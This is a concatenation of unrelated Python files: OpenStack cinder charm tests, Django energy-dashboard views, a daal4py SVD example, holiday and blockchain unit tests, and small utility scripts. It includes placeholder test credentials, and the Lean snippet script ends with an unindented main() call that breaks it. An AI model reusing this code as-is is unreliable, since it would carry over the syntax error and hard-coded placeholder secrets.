            msg = u.relation_error(
                'cinder cinder-datera storage-backend', ret)
            amulet.raise_status(amulet.FAIL, msg=msg)

    def test_204_mysql_cinder_db_relation(self):
        """Verify the mysql:glance shared-db relation data"""
        u.log.debug('Checking mysql:cinder db relation data...')
        unit = self.pxc_sentry
        relation = ['shared-db', 'cinder:shared-db']
        expected = {
            'private-address': u.valid_ip,
            'db_host': u.valid_ip
        }
        ret = u.validate_relation_data(unit, relation, expected)
        if ret:
            msg = u.relation_error('mysql shared-db', ret)
            amulet.raise_status(amulet.FAIL, msg=msg)

    def test_205_cinder_mysql_db_relation(self):
        """Verify the cinder:mysql shared-db relation data"""
        u.log.debug('Checking cinder:mysql db relation data...')
        unit = self.cinder_sentry
        relation = ['shared-db', 'percona-cluster:shared-db']
        expected = {
            'private-address': u.valid_ip,
            'hostname': u.valid_ip,
            'username': 'cinder',
            'database': 'cinder'
        }
        ret = u.validate_relation_data(unit, relation, expected)
        if ret:
            msg = u.relation_error('cinder shared-db', ret)
            amulet.raise_status(amulet.FAIL, msg=msg)

    def test_206_keystone_cinder_id_relation(self):
        """Verify the keystone:cinder identity-service relation data"""
        u.log.debug('Checking keystone:cinder id relation data...')
        unit = self.keystone_sentry
        relation = ['identity-service',
                    'cinder:identity-service']
        expected = {
            'service_protocol': 'http',
            'service_tenant': 'services',
            'admin_token': 'ubuntutesting',
            'service_password': u.not_null,
            'service_port': '5000',
            'auth_port': '35357',
            'auth_protocol': 'http',
            'private-address': u.valid_ip,
            'auth_host': u.valid_ip,
            'service_tenant_id': u.not_null,
            'service_host': u.valid_ip
        }
        if self._get_openstack_release() < self.xenial_pike:
            # Ocata and earlier
            expected['service_username'] = 'cinder_cinderv2'
        else:
            # Pike and later
            expected['service_username'] = 'cinderv2_cinderv3'
        ret = u.validate_relation_data(unit, relation, expected)
        if ret:
            msg = u.relation_error('identity-service cinder', ret)
            amulet.raise_status(amulet.FAIL, msg=msg)

    def test_207_cinder_keystone_id_relation(self):
        """Verify the cinder:keystone identity-service relation data"""
        u.log.debug('Checking cinder:keystone id relation data...')
        unit = self.cinder_sentry
        relation = ['identity-service',
                    'keystone:identity-service']
        expected = {
            'private-address': u.valid_ip
        }
        ret = u.validate_relation_data(unit, relation, expected)
        if ret:
            msg = u.relation_error('cinder identity-service', ret)
            amulet.raise_status(amulet.FAIL, msg=msg)

    def test_208_rabbitmq_cinder_amqp_relation(self):
        """Verify the rabbitmq-server:cinder amqp relation data"""
        u.log.debug('Checking rmq:cinder amqp relation data...')
        unit = self.rabbitmq_sentry
        relation = ['amqp', 'cinder:amqp']
        expected = {
            'private-address': u.valid_ip,
            'password': u.not_null,
            'hostname': u.valid_ip
        }
        ret = u.validate_relation_data(unit, relation, expected)
        if ret:
            msg = u.relation_error('amqp cinder', ret)
            amulet.raise_status(amulet.FAIL, msg=msg)

    def test_209_cinder_rabbitmq_amqp_relation(self):
        """Verify the cinder:rabbitmq-server amqp relation data"""
        u.log.debug('Checking cinder:rmq amqp relation data...')
        unit = self.cinder_sentry
        relation = ['amqp', 'rabbitmq-server:amqp']
        expected = {
            'private-address': u.valid_ip,
            'vhost': 'openstack',
            'username': u.not_null
        }
        ret = u.validate_relation_data(unit, relation, expected)
        if ret:
            msg = u.relation_error('cinder amqp', ret)
            amulet.raise_status(amulet.FAIL, msg=msg)

    def test_300_cinder_config(self):
        """Verify the data in the cinder.conf file."""
        u.log.debug('Checking cinder config file data...')
        unit = self.cinder_sentry
        conf = '/etc/cinder/cinder.conf'
        unit_mq = self.rabbitmq_sentry
        rel_mq_ci = unit_mq.relation('amqp', 'cinder:amqp')

        dat_backend = 'cinder-datera'

        expected = {
            'DEFAULT': {
                'debug': 'False',
                'verbose': 'False',
                'auth_strategy': 'keystone',
                'enabled_backends': dat_backend
            },
            dat_backend: {
                'san_ip': '172.19.1.222',
                'san_login': 'admin',
                'san_password': 'password',
                'volume_backend_name': dat_backend,
                'volume_driver': (
                    'cinder.volume.drivers.datera.datera_iscsi.DateraDriver')
            }
        }

        expected_rmq = {
            'rabbit_userid': 'cinder',
            'rabbit_virtual_host': 'openstack',
            'rabbit_password': rel_mq_ci['password'],
            'rabbit_host': rel_mq_ci['hostname'],
        }

        if self._get_openstack_release() >= self.trusty_kilo:
            # Kilo or later
            expected['oslo_messaging_rabbit'] = expected_rmq
        else:
            # Juno or earlier
            expected['DEFAULT'].update(expected_rmq)

        # .items() instead of the Python-2-only .iteritems()
        for section, pairs in expected.items():
            ret = u.validate_config_data(unit, conf, section, pairs)
            if ret:
                message = "cinder config error: {}".format(ret)
                amulet.raise_status(amulet.FAIL, msg=message)

    def test_400_cinder_api_connection(self):
        """Simple api call to check service is up and responding"""
        u.log.debug('Checking basic cinder api functionality...')
        check = list(self.cinder.volumes.list())
        u.log.debug('Cinder api check (volumes.list): {}'.format(check))
        assert(check == [])

    def test_402_create_delete_volume(self):
        """Create a cinder volume and delete it."""
        u.log.debug('Creating, checking and deleting cinder volume...')
        vol_new = u.create_cinder_volume(self.cinder)
        vol_id = vol_new.id
        u.delete_resource(self.cinder.volumes, vol_id, msg="cinder volume")
|
"""Template exceptions."""
class MalformedTemplate(Exception):
    """Raised when a template exists but cannot be parsed."""

    def __init__(self, cause):
        """Build the exception message from *cause*."""
        super().__init__(f"Malformed template: {cause}")
class MissingTemplate(Exception):
    """Raised when no template is found at the given path."""

    def __init__(self, path):
        """Build the exception message from the missing *path*."""
        super().__init__(f"Missing template: {path}")
|
from django.shortcuts import render_to_response
from django.shortcuts import render
from .models import *
from django.http import HttpResponse
import json
from datetime import datetime
from datetime import date, timedelta
from datetime import time
from django.http import HttpResponseRedirect
import cgi
from isoweek import Week
def get_week_days(year, week):
    """Return the (monday, sunday) pair bounding ISO-style week *week* of *year*."""
    jan1 = date(year, 1, 1)
    # Week 1 is the week containing the first Thursday: shift Jan 1 to the
    # Monday of that week (forward if Jan 1 falls Fri-Sun, backward otherwise).
    if jan1.weekday() > 3:
        week1_monday = jan1 + timedelta(days=7 - jan1.weekday())
    else:
        week1_monday = jan1 - timedelta(days=jan1.weekday())
    start = week1_monday + timedelta(weeks=week - 1)
    return start, start + timedelta(days=6)
def home(request):
    """Render the static home page.

    Uses render() instead of render_to_response(), which was deprecated in
    Django 2.0 and removed in 3.0, matching the other views in this module.
    """
    return render(request, 'myapp/home.html')
def main(request):
    """Render the main page with all StreetLighting1 units in context."""
    lighting_units = list(StreetLighting1.objects.all())
    return render(request, 'myapp/main.html', {'test': lighting_units})
def data_main(request):
    """Return map-marker data for every asset type as a JSON list.

    Each entry has: type, dimos (municipality), kwdikos (asset code),
    latitude, longitude.  Replaces four copy-pasted loops with one
    table-driven loop and drops the per-row debug prints.
    """
    # (queryset, marker type, attribute holding the asset code)
    sources = [
        (StreetLighting1.objects.all()[4:7], "street_lighting1", "code"),
        (Building.objects.all(), "building", "building_code"),
        (StreetLighting.objects.all(), "street_lighting", "line_code"),
        (ElectricVehicle.objects.all(), "EV", "chargingpoint_code"),
    ]
    json_list = []
    for queryset, type_name, code_attr in sources:
        for item in queryset:
            json_list.append({
                'type': type_name,
                'dimos': item.municipality,
                'kwdikos': getattr(item, code_attr),
                'latitude': item.latitude,
                'longitude': item.longitude,
            })
    return HttpResponse(json.dumps(json_list), content_type='application/json')
def buildings(request):
    """Render the buildings page with every Building in context."""
    building_list = list(Building.objects.all())
    return render(request, 'myapp/buildings.html', {'all_buildings': building_list})
def data_buildings(request):
    """Return per-building metric time series as JSON.

    GET params: state  -> '_'-joined "graph-button-<pk>" ids
                state2 -> indicator (kwh, kwh_m2, lt, lt_m2, kw, co2_tn,
                          co2_tn_m2, co2_lt, co2_lt_m2)
                state3 -> time scope (month / week / day / anything else)
                state4 -> start date YYYY-MM-DD (inclusive)
                state5 -> end date YYYY-MM-DD (inclusive)

    Fixes: no longer shadows the builtin `list`; an unknown indicator now
    yields an empty series instead of a NameError; debug prints removed.
    """
    ids = request.GET['state']
    indicator = request.GET['state2']
    time_scope = request.GET['state3']
    from_date1 = datetime.strptime(request.GET['state4'], "%Y-%m-%d").date()
    to_date1 = datetime.strptime(request.GET['state5'], "%Y-%m-%d").date()
    # %Y-%m-%d strings compare lexicographically in date order
    lo = from_date1.strftime('%Y-%m-%d')
    hi = to_date1.strftime('%Y-%m-%d')

    def label(ts):
        # Human-readable x-axis label for the requested time scope.
        if time_scope == "month":
            return ts.strftime('%b')
        if time_scope == "week":
            wk = Week(int(ts.strftime('%Y')), int(ts.strftime('%W')))
            return (wk.monday().strftime('%d-%m-%Y') + " - " +
                    wk.sunday().strftime('%d-%m-%Y'))
        if time_scope == "day":
            return ts.strftime('%d-%b')
        return ts.strftime('%d-%b %H:%M:%S')

    json_list = []
    if ids:
        # "graph-button-3_graph-button-7" -> [3, 7]
        pks = [int(b.split('graph-button-')[1]) for b in ids.split("_")]
        per_m2 = indicator.endswith('_m2')
        base = indicator[:-3] if per_m2 else indicator
        for pk in pks:
            building = Building.objects.get(id=pk)
            if base in ("kwh", "lt", "kw", "co2_tn", "co2_lt"):
                series = getattr(building, base).all()
            else:
                series = []  # unknown indicator: previously raised NameError
            for rec in series:
                if lo <= rec.timestamp.strftime('%Y-%m-%d') <= hi:
                    value = float(rec.metric)
                    if per_m2:
                        value /= building.surface
                    json_list.append({'municipality': building.municipality,
                                      'code': building.building_code,
                                      'metric': format(value, '.3f'),
                                      'timestamp': label(rec.timestamp)})
    return HttpResponse(json.dumps(json_list), content_type='application/json')
def street_lighting(request):
    """Render the street-lighting page with every StreetLighting line.

    Uses render() instead of render_to_response(), which was deprecated in
    Django 2.0 and removed in 3.0, matching the other views in this module.
    """
    all_street_lighting = list(StreetLighting.objects.all())
    return render(request, 'myapp/street_lighting.html',
                  {'all_street_lighting': all_street_lighting})
def data_street_lighting(request):
    """Return per-lighting-line metric time series as JSON.

    GET params mirror data_buildings: state=ids, state2=indicator
    (kwh, kwh_line_length, kwh_light, kw, co2_tn, co2_tn_line_length),
    state3=time scope, state4/state5=inclusive date range.

    Fixes: no longer shadows the builtin `list`; an unknown indicator now
    yields an empty series instead of a NameError; debug prints removed.
    """
    ids = request.GET['state']
    indicator = request.GET['state2']
    time_scope = request.GET['state3']
    from_date1 = datetime.strptime(request.GET['state4'], "%Y-%m-%d").date()
    to_date1 = datetime.strptime(request.GET['state5'], "%Y-%m-%d").date()
    # %Y-%m-%d strings compare lexicographically in date order
    lo = from_date1.strftime('%Y-%m-%d')
    hi = to_date1.strftime('%Y-%m-%d')

    def label(ts):
        # Human-readable x-axis label for the requested time scope.
        if time_scope == "month":
            return ts.strftime('%b')
        if time_scope == "week":
            wk = Week(int(ts.strftime('%Y')), int(ts.strftime('%W')))
            return (wk.monday().strftime('%d-%m-%Y') + " - " +
                    wk.sunday().strftime('%d-%m-%Y'))
        if time_scope == "day":
            return ts.strftime('%d-%b')
        return ts.strftime('%d-%b %H:%M:%S')

    json_list = []
    if ids:
        pks = [int(b.split('graph-button-')[1]) for b in ids.split("_")]
        for pk in pks:
            unit = StreetLighting.objects.get(id=pk)
            if indicator in ("kwh", "kwh_line_length", "kwh_light"):
                series = unit.kwh.all()
            elif indicator == "kw":
                series = unit.kw.all()
            elif indicator in ("co2_tn", "co2_tn_line_length"):
                series = unit.co2_tn.all()
            else:
                series = []  # unknown indicator: previously raised NameError
            for rec in series:
                if lo <= rec.timestamp.strftime('%Y-%m-%d') <= hi:
                    if indicator in ("kwh", "kw", "co2_tn"):
                        metric = format(float(rec.metric), '.3f')
                    elif indicator == "kwh_light":
                        metric = format(float(rec.metric) / unit.lights_number, '.3f')
                    else:
                        metric = format(float(rec.metric) / unit.line_length, '.3f')
                    json_list.append({'municipality': unit.municipality,
                                      'code': unit.line_code,
                                      'metric': metric,
                                      'timestamp': label(rec.timestamp)})
    return HttpResponse(json.dumps(json_list), content_type='application/json')
def EVs(request):
    """Render the EV charging-points page.

    Uses render() instead of render_to_response(), which was deprecated in
    Django 2.0 and removed in 3.0, matching the other views in this module.
    """
    all_EVs = list(ElectricVehicle.objects.all())
    return render(request, 'myapp/EVs.html', {'all_EVs': all_EVs})
def data_EVs(request):
    """Return per-charging-point metric time series as JSON.

    GET params mirror data_buildings: state=ids, state2=indicator
    (kwh, total_charging_points, available_charging_points, co2_tn),
    state3=time scope, state4/state5=inclusive date range.

    Fixes: no longer shadows the builtin `list`; an unknown indicator now
    yields an empty series instead of a NameError; debug prints removed.
    """
    ids = request.GET['state']
    indicator = request.GET['state2']
    time_scope = request.GET['state3']
    from_date1 = datetime.strptime(request.GET['state4'], "%Y-%m-%d").date()
    to_date1 = datetime.strptime(request.GET['state5'], "%Y-%m-%d").date()
    # %Y-%m-%d strings compare lexicographically in date order
    lo = from_date1.strftime('%Y-%m-%d')
    hi = to_date1.strftime('%Y-%m-%d')

    def label(ts):
        # Human-readable x-axis label for the requested time scope.
        if time_scope == "month":
            return ts.strftime('%b')
        if time_scope == "week":
            wk = Week(int(ts.strftime('%Y')), int(ts.strftime('%W')))
            return (wk.monday().strftime('%d-%m-%Y') + " - " +
                    wk.sunday().strftime('%d-%m-%Y'))
        if time_scope == "day":
            return ts.strftime('%d-%b')
        return ts.strftime('%d-%b %H:%M:%S')

    json_list = []
    if ids:
        pks = [int(b.split('graph-button-')[1]) for b in ids.split("_")]
        for pk in pks:
            point = ElectricVehicle.objects.get(id=pk)
            if indicator in ("kwh", "total_charging_points",
                             "available_charging_points", "co2_tn"):
                series = getattr(point, indicator).all()
            else:
                series = []  # unknown indicator: previously raised NameError
            for rec in series:
                if lo <= rec.timestamp.strftime('%Y-%m-%d') <= hi:
                    if indicator in ("kwh", "co2_tn"):
                        metric = format(float(rec.metric), '.3f')
                    else:
                        # charging-point counts are reported raw
                        metric = rec.metric
                    json_list.append({'municipality': point.municipality,
                                      'code': point.chargingpoint_code,
                                      'metric': metric,
                                      'timestamp': label(rec.timestamp)})
    return HttpResponse(json.dumps(json_list), content_type='application/json')
#def test2(request):
# return render_to_response('myapp/test2.html')
def mydata(request):
    """Render the mydata page with all StreetLighting1 units in context."""
    lighting_units = list(StreetLighting1.objects.all())
    return render(request, 'myapp/mydata.html', {'test1': lighting_units})
def data_test(request):
    """Return kw/kwh series for the selected StreetLighting1 units as JSON.

    GET params mirror data_buildings: state=ids, state2=indicator (kw or
    kwh), state3=time scope, state4/state5=date range.  Consolidates the
    four near-identical dict-building branches and removes debug prints.
    """
    ids = request.GET['state']
    indicator = request.GET['state2']
    time_scope = request.GET['state3']
    from_date1 = datetime.strptime(request.GET['state4'], "%Y-%m-%d").date()
    to_date1 = datetime.strptime(request.GET['state5'], "%Y-%m-%d").date()
    # %Y-%m-%d strings compare lexicographically in date order
    lo = from_date1.strftime('%Y-%m-%d')
    hi = to_date1.strftime('%Y-%m-%d')

    def label(ts):
        # Human-readable x-axis label for the requested time scope.
        if time_scope == "month":
            return ts.strftime('%b')
        if time_scope == "week":
            wk = Week(int(ts.strftime('%Y')), int(ts.strftime('%W')))
            return (wk.monday().strftime('%d-%m-%Y') + " - " +
                    wk.sunday().strftime('%d-%m-%Y'))
        if time_scope == "day":
            return ts.strftime('%d-%b')
        return ts.strftime('%d-%b %H:%M:%S')

    json_list = []
    if ids:
        pks = [int(b.split('graph-button-')[1]) for b in ids.split("_")]
        if indicator == "kw":
            for pk in pks:
                unit = StreetLighting1.objects.get(id=pk)
                for rec in unit.kw.all():
                    if lo <= rec.timestamp.strftime('%Y-%m-%d') <= hi:
                        json_list.append({'dimos': unit.municipality,
                                          'kwdikos': unit.code,
                                          'metric': rec.metric,
                                          'timestamp': label(rec.timestamp)})
        elif indicator == "kwh":
            # NOTE(review): the original applies no date filter and always
            # uses a full datetime label for kwh -- preserved; confirm this
            # asymmetry with the kw branch is intended.
            for pk in pks:
                unit = StreetLighting1.objects.get(id=pk)
                for rec in unit.kwh.all():
                    json_list.append({
                        'dimos': unit.municipality,
                        'kwdikos': unit.code,
                        'metric': rec.metric,
                        'timestamp': rec.timestamp.strftime('%d-%b-%Y %H:%M:%S')})
    return HttpResponse(json.dumps(json_list), content_type='application/json')
#*******************************************************************************
# Copyright 2014-2018 Intel Corporation
# All Rights Reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License"), the following terms apply:
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#*******************************************************************************
# Example showing daal4py's operation on streams using a generator
import daal4py as d4p
import numpy as np
import os
def read_next(file, chunksize):
    """Yield successive 2-D chunks of up to *chunksize* rows from CSV *file*.

    Every yielded array has shape (rows, cols).  Fixes two defects of the
    original: a 1x1 chunk (genfromtxt returns a 0-d array) crashed on
    ``a.shape[0]``, and a single remaining row of a multi-column file was
    yielded as a column vector instead of a (1, cols) row.
    """
    assert os.path.isfile(file)
    skipped = 0   # rows consumed so far; < 0 signals end-of-file
    ncols = None  # column count learned from the first chunk
    while True:
        if skipped < 0:
            return
        a = np.genfromtxt(file, delimiter=',', skip_header=skipped,
                          max_rows=chunksize)
        if a.size == 0:
            return
        if a.ndim == 0:
            # single value read (1 row x 1 column)
            a = a.reshape(1, 1)
        elif a.ndim == 1:
            # Ambiguous 1-D result: one row of a multi-column file, or a
            # chunk of a single-column file.  Disambiguate via the column
            # count remembered from an earlier 2-D chunk.
            if ncols is not None and ncols > 1 and a.shape[0] == ncols:
                a = a[np.newaxis, :]
            else:
                a = a[:, np.newaxis]
        if ncols is None:
            ncols = a.shape[1]
        # a short chunk means eof; otherwise advance the skip counter
        if chunksize > a.shape[0]:
            skipped = -1
        else:
            skipped += a.shape[0]
        yield a
# Build the chunk generator over the input CSV (~112 rows per chunk).
reader = read_next("./data/batch/svd.csv", 112)

# Create an SVD algorithm object in streaming mode.
algo = d4p.svd(streaming=True)

# Feed each chunk into the streaming computation.
for data_chunk in reader:
    algo.compute(data_chunk)

# Finalize the stream and report the result.
res = algo.finalize()
print("Singular values:\n", res.singularValues)
|
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <ryanssdev@icloud.com> (c) 2014-2017
# dr-prodigy <maurizio.montel@gmail.com> (c) 2017-2021
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
import unittest
from datetime import date
import holidays
class TestFrance(unittest.TestCase):
    """Checks for French national and provincial/overseas holidays."""

    def setUp(self):
        """Build the national calendar plus one calendar per province."""
        self.holidays = holidays.France()
        self.prov_holidays = {
            prov: holidays.FR(prov=prov) for prov in holidays.FRA.PROVINCES
        }

    def _assert_prov_dates(self, prov, dates):
        """Assert that every date in *dates* is a holiday in *prov*."""
        calendar = self.prov_holidays[prov]
        for day in dates:
            self.assertIn(day, calendar)

    def test_2017(self):
        """All 2017 metropolitan public holidays are present."""
        for month, day in ((1, 1), (4, 17), (5, 1), (5, 8),
                           (5, 25), (6, 5), (7, 14)):
            self.assertIn(date(2017, month, day), self.holidays)

    def test_others(self):
        """May 1st carried a longer name in 1948."""
        self.assertEqual(
            self.holidays[date(1948, 5, 1)],
            "Fête du Travail et de la Concorde sociale",
        )

    def test_alsace_moselle(self):
        self._assert_prov_dates(
            "Alsace-Moselle", [date(2017, 4, 14), date(2017, 12, 26)])

    def test_mayotte(self):
        self._assert_prov_dates("Mayotte", [date(2017, 4, 27)])

    def test_wallis_et_futuna(self):
        self._assert_prov_dates(
            "Wallis-et-Futuna", [date(2017, 4, 28), date(2017, 7, 29)])

    def test_martinique(self):
        self._assert_prov_dates("Martinique", [date(2017, 5, 22)])

    def test_guadeloupe(self):
        self._assert_prov_dates(
            "Guadeloupe", [date(2017, 5, 27), date(2017, 7, 21)])

    def test_guyane(self):
        self._assert_prov_dates("Guyane", [date(2017, 6, 10)])

    def test_polynesie_francaise(self):
        self._assert_prov_dates("Polynésie Française", [date(2017, 6, 29)])

    def test_nouvelle_caledonie(self):
        self._assert_prov_dates("Nouvelle-Calédonie", [date(2017, 9, 24)])

    def test_saint_barthelemy(self):
        self._assert_prov_dates("Saint-Barthélémy", [date(2017, 10, 9)])

    def test_la_reunion(self):
        self._assert_prov_dates("La Réunion", [date(2017, 12, 20)])
|
from faker import Faker
from faker.providers import BaseProvider, internet
# Brazilian-Portuguese locale so names/phones/emails look locally plausible.
fake = Faker('pt_BR')

# Canonical fake user record shared by the Resource provider below.
# Keys are the internal field names; Resource.resource() maps them to the
# web-service field names.  Values are regenerated on every import.
data = {
    'login': fake.user_name(),
    'name': fake.name(),
    # single random pick from ('I', 'E') -- presumably internal/external;
    # TODO confirm the meaning of the codes
    'user_type': fake.random_elements(elements=('I', 'E'))[0],
    'main_email': fake.email(),
    'alternative_email': fake.email(),
    'usp_email': fake.email(),
    'formatted_phone': fake.phone_number(),
    'wsuserid': fake.msisdn(),
    # serialized-empty-list placeholder for the "vinculo" (bind) field
    'bind': '[]',
}
class Resource(BaseProvider):
    """Faker provider exposing the module-level fake user record in two shapes."""

    # web-service field name -> internal key in the module-level `data`
    _FIELDS = (
        ('loginUsuario', 'login'),
        ('nomeUsuario', 'name'),
        ('tipoUsuario', 'user_type'),
        ('emailPrincipalUsuario', 'main_email'),
        ('emailAlternativoUsuario', 'alternative_email'),
        ('emailUspUsuario', 'usp_email'),
        ('numeroTelefoneFormatado', 'formatted_phone'),
        ('wsuserid', 'wsuserid'),
        ('vinculo', 'bind'),
    )

    def resource(self):
        """Return the record keyed by the web-service field names."""
        return {external: data.get(internal)
                for external, internal in self._FIELDS}

    def resource_transformed(self):
        """Return the record keyed by the internal field names."""
        return data


fake.add_provider(Resource)
|
import logging
import os
def setup_logger():
    """Configure the root logger with a console handler and return it.

    Level is INFO when the ENV environment variable is "prod", DEBUG
    otherwise.  Unlike the original, calling this more than once no longer
    stacks duplicate StreamHandlers (which caused every record to be
    printed once per call).
    """
    logger = logging.getLogger("")
    level = logging.INFO if os.getenv("ENV") == "prod" else logging.DEBUG
    logger.setLevel(level)

    # Only attach a console handler if one is not already present.
    if not any(isinstance(h, logging.StreamHandler) for h in logger.handlers):
        ch = logging.StreamHandler()
        ch.setLevel(level)
        formatter = logging.Formatter(
            "%(asctime)s [%(levelname)s] %(name)s: %(message)s")
        ch.setFormatter(formatter)
        logger.addHandler(ch)
    return logger

|
from urllib import request
import json
import os
import glob
def template(name, key, definition):
    """Render a yasnippet snippet file: header comment block then the body."""
    header = [
        "# -*- mode: snippet -*-",
        f"# name: {name}",
        f"# key: {key}",
        "# --",
    ]
    return "\n".join(header) + f"\n{definition}"
def main():
    """Download the Lean abbreviation table and emit yasnippet files.

    Fetches the vscode-lean abbreviations JSON, then writes two snippet
    files per abbreviation — triggered by ``\\<key>`` and ``~\\<key>`` —
    into the user's org-mode snippet directory.
    """
    file_url = "https://raw.githubusercontent.com/leanprover/vscode-lean/master/src/abbreviation/abbreviations.json"
    snippets_dir = os.path.expanduser("~/.emacs.d/private/snippets/org-mode/")
    file_prefix = "lean_symbols_autogen_393939"
    # exist_ok replaces the previous isdir()+mkdir() pair and also creates
    # missing parent directories.
    os.makedirs(snippets_dir, exist_ok=True)
    path, _ = request.urlretrieve(file_url)
    try:
        with open(path, 'r') as f:
            data = json.load(f)
    finally:
        # Always remove the downloaded temp file, even if parsing fails.
        os.remove(path)
    for i, (key, definition) in enumerate(data.items()):
        # NOTE(review): `definition` is embedded in the output file name;
        # this assumes the upstream table never contains path separators —
        # confirm.
        contents = [
            template(key, f"\\{key}", definition),
            template(key, f"~\\{key}", definition),
        ]
        for j, c in enumerate(contents):
            with open(f"{snippets_dir}/{file_prefix}-{i}-{j}-{definition}", "w") as out:
                out.write(c)
if __name__ == "__main__":
main()
|
# coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
from random import shuffle
from unittest import TestCase
from mock import Mock, PropertyMock, patch
from tests.misc.helper import get_alice_xmss, get_slave_xmss, get_random_xmss
from qrl.core.misc import logger
from qrl.core import config
from qrl.core.AddressState import AddressState
# Module-level fixtures: initialize logging once, then create the wallets
# shared by every test in this module.
logger.initialize_default()
alice = get_alice_xmss()
slave = get_slave_xmss()
class TestAddressState(TestCase):
    """Unit tests for qrl.core.AddressState.AddressState."""

    def setUp(self):
        """Create a fresh default AddressState for alice before each test."""
        self.addr_state = AddressState.get_default(alice.address)

    def test_create_and_properties(self):
        """create() wires every field through to pbdata and the properties."""
        a = AddressState.create(address=alice.address, nonce=0, balance=10,
                                ots_bitfield=[b'\x00'] * config.dev.ots_bitfield_size,
                                tokens={b'010101': 100, b'020202': 200},
                                slave_pks_access_type={slave.pk: 1},
                                ots_counter=0
                                )
        self.assertEqual(a.pbdata.address, a.address)
        self.assertEqual(a.pbdata.balance, a.balance)
        # balance is writable through the property and round-trips.
        a.balance = 3
        self.assertEqual(a.balance, 3)
        self.assertEqual(a.pbdata.nonce, a.nonce)
        self.assertEqual(a.pbdata.ots_bitfield, a.ots_bitfield)
        self.assertEqual(a.pbdata.ots_counter, a.ots_counter)
        self.assertEqual(a.pbdata.transaction_hashes, a.transaction_hashes)
        self.assertEqual(a.pbdata.latticePK_list, a.latticePK_list)
        self.assertEqual(a.pbdata.slave_pks_access_type, a.slave_pks_access_type)

    def test_token_balance_functionality(self):
        # If I update an AddressState's token balance, it should do what the function name says.
        self.addr_state.update_token_balance(b'010101', 10)
        self.assertEqual(self.addr_state.get_token_balance(b'010101'), 10)
        self.assertTrue(self.addr_state.is_token_exists(b'010101'))
        # I can call update_token_balance with a negative number to decrease the balance.
        self.addr_state.update_token_balance(b'010101', -2)
        self.assertEqual(self.addr_state.get_token_balance(b'010101'), 8)
        # If the token balance hits 0, the token_txhash should have been pruned from the AddressState.
        # And when I ask for its balance, it should return 0.
        self.addr_state.update_token_balance(b'010101', -8)
        self.assertFalse(self.addr_state.is_token_exists(b'010101'))
        self.assertEqual(self.addr_state.get_token_balance(b'010101'), 0)

    def test_nonce(self):
        """increase_nonce()/decrease_nonce() move the nonce by one per call."""
        self.addr_state.increase_nonce()
        self.assertEqual(self.addr_state.nonce, 1)
        self.addr_state.increase_nonce()
        self.addr_state.increase_nonce()
        self.assertEqual(self.addr_state.nonce, 3)
        self.addr_state.decrease_nonce()
        self.addr_state.decrease_nonce()
        self.assertEqual(self.addr_state.nonce, 1)

    def test_nonce_negative(self):
        """Decreasing the nonce below zero raises ValueError."""
        with self.assertRaises(ValueError):
            self.addr_state.decrease_nonce()

    def test_slave_pks_access_type(self):
        # slave_pks_access_type could take 2 values: 0 (all permission granted to slaves), 1 (only mining)
        # There is no validation for the values of slave_pks_access_type.
        # For now only 0 is used.
        # By default all slave_pks get permission level 0
        self.addr_state.add_slave_pks_access_type(slave.pk, 1)
        self.assertEqual(self.addr_state.slave_pks_access_type[str(slave.pk)], 1)

    def test_get_slave_permission(self):
        # We haven't added slave.pk to the addr_state yet, so slave is not yet a slave of this AddressState.
        self.assertEqual(self.addr_state.get_slave_permission(slave.pk), -1)
        # Add slave permissions for slave.pk
        self.addr_state.add_slave_pks_access_type(slave.pk, 1)
        self.assertEqual(self.addr_state.get_slave_permission(slave.pk), 1)
        # Remove slave permissions for slave.pk
        self.addr_state.remove_slave_pks_access_type(slave.pk)
        self.assertEqual(self.addr_state.get_slave_permission(slave.pk), -1)

    def test_lattice_txn(self):
        # Add a mock LatticeTransaction to the AddressState. It should show up in addr_state.latticePK_list
        m_lattice_txn = Mock(name='mock LatticeTransaction', txhash=b'txhash', dilithium_pk=b'dilithiumPK',
                             kyber_pk=b'kyberPK')
        self.assertEqual(len(self.addr_state.latticePK_list), 0)
        self.addr_state.add_lattice_pk(m_lattice_txn)
        self.assertEqual(len(self.addr_state.latticePK_list), 1)
        # Add another different LatticeTransaction. addr_state.latticePK_list should now be longer.
        m_lattice_txn_2 = Mock(name='mock LatticeTransaction 2', txhash=b'deadbeef', dilithium_pk=b'dilithiumPK',
                               kyber_pk=b'kyberPK')
        self.addr_state.add_lattice_pk(m_lattice_txn_2)
        self.assertEqual(len(self.addr_state.latticePK_list), 2)
        # Remove the second LatticeTransaction.
        self.addr_state.remove_lattice_pk(m_lattice_txn_2)
        self.assertEqual(len(self.addr_state.latticePK_list), 1)
        # Try to remove the second LatticeTransaction again
        # The list should remain the same.
        self.addr_state.remove_lattice_pk(m_lattice_txn_2)
        self.assertEqual(len(self.addr_state.latticePK_list), 1)

    def test_get_default_coinbase(self):
        # Make sure that Coinbase AddressState gets all the coins supply by default
        coinbase_addr_state = AddressState.get_default(config.dev.coinbase_address)
        self.assertEqual(coinbase_addr_state.balance, int(config.dev.max_coin_supply * config.dev.shor_per_quanta))

    def test_set_ots_key(self):
        # If it's below config.dev.max_ots_tracking_index, use the bitfield.
        self.assertEqual(b'\x00', self.addr_state.ots_bitfield[0])
        self.addr_state.set_ots_key(0)
        self.assertEqual(b'\x01', self.addr_state.ots_bitfield[0])
        self.assertEqual(self.addr_state.ots_counter, 0)
        self.assertEqual(b'\x00', self.addr_state.ots_bitfield[-1])
        self.addr_state.set_ots_key(config.dev.max_ots_tracking_index - 1)
        self.assertEqual(b'\x80', self.addr_state.ots_bitfield[-1])
        # Start using the counter from config.dev.max_ots_tracking_index and above.
        self.addr_state.set_ots_key(config.dev.max_ots_tracking_index)
        self.assertEqual(self.addr_state.ots_counter, config.dev.max_ots_tracking_index)
        self.addr_state.set_ots_key(config.dev.max_ots_tracking_index + 1)
